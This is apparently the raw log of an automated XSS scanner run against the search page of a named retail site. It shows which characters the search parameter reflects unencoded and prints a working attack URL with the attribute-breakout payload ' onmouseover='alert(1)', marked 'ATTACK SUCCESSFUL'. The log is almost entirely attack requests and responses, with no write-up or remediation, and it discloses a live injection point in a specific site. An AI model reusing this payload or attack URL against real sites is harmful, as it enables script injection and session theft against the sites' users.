https://www.abcstores.com/

GET Params:[1]
['q']
_______________________________________________________________________________________________________
https://www.abcstores.com/catalogsearch/result/?q=(uvw"xyz'yxz</zxy

----------------------------------------------------------------------------------
Attribute Context: [2]
<input id="search" type="search" name="q" value="(uvw&quot;xyz'yxz&lt;/zxy" class="input-text required-entry" maxlength="128" placeholder="Search entire store here..." />
<input id="search" type="search" name="q" value="(uvw&quot;xyz'yxz&lt;/zxy" class="input-text required-entry" maxlength="128" placeholder="Search entire store here..." />

----------------------------------------------------------------------------------
HTML Context: [3]
<title>Search results for: '(uvw&quot;xyz'yxz&lt;/zxy'</title>
<strong>Search results for: '(uvw&quot;xyz'yxz&lt;/zxy'</strong>
<h1>Search results for '(uvw&quot;xyz'yxz&lt;/zxy'</h1>

----------------------------------------------------------------------------------
Script Context: [0]

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------
Same Attr : [0]

----------------------------------------------------------------------------------
Same HTML : [0]

----------------------------------------------------------------------------------
Same Script : [0]

----------------------------------------------------------------------------------
Same URI : [0]


ENCODING     Presence	"	'	<	( 
ATTR:		True	True	False	True	False

Attack Payloads for ATTR
["' onmouseover='alert(1)"]

ATTR Attack Url: https://www.abcstores.com/catalogsearch/result/?q=' onmouseover='alert(1)

=> ATTACK SUCCESSFUL with Payload: ' onmouseover='alert(1)
Detection of Payload: 
<input id="search" type="search" name="q" value="' onmouseover='alert(1)" class="input-text required-entry" maxlength="128" placeholder="Search entire store here..." />
<input id="search" type="search" name="q" value="' onmouseover='alert(1)" class="input-text required-entry" maxlength="128" placeholder="Search entire store here..." />
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	False	True	False

Attack Payloads for ATTR
["' onmouseover='alert(1)"]

ATTR Attack Url: https://www.abcstores.com/catalogsearch/result/?q=' onmouseover='alert(1)

=> ATTACK SUCCESSFUL with Payload: ' onmouseover='alert(1)
Detection of Payload: 
<input id="search" type="search" name="q" value="' onmouseover='alert(1)" class="input-text required-entry" maxlength="128" placeholder="Search entire store here..." />
<input id="search" type="search" name="q" value="' onmouseover='alert(1)" class="input-text required-entry" maxlength="128" placeholder="Search entire store here..." />
ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
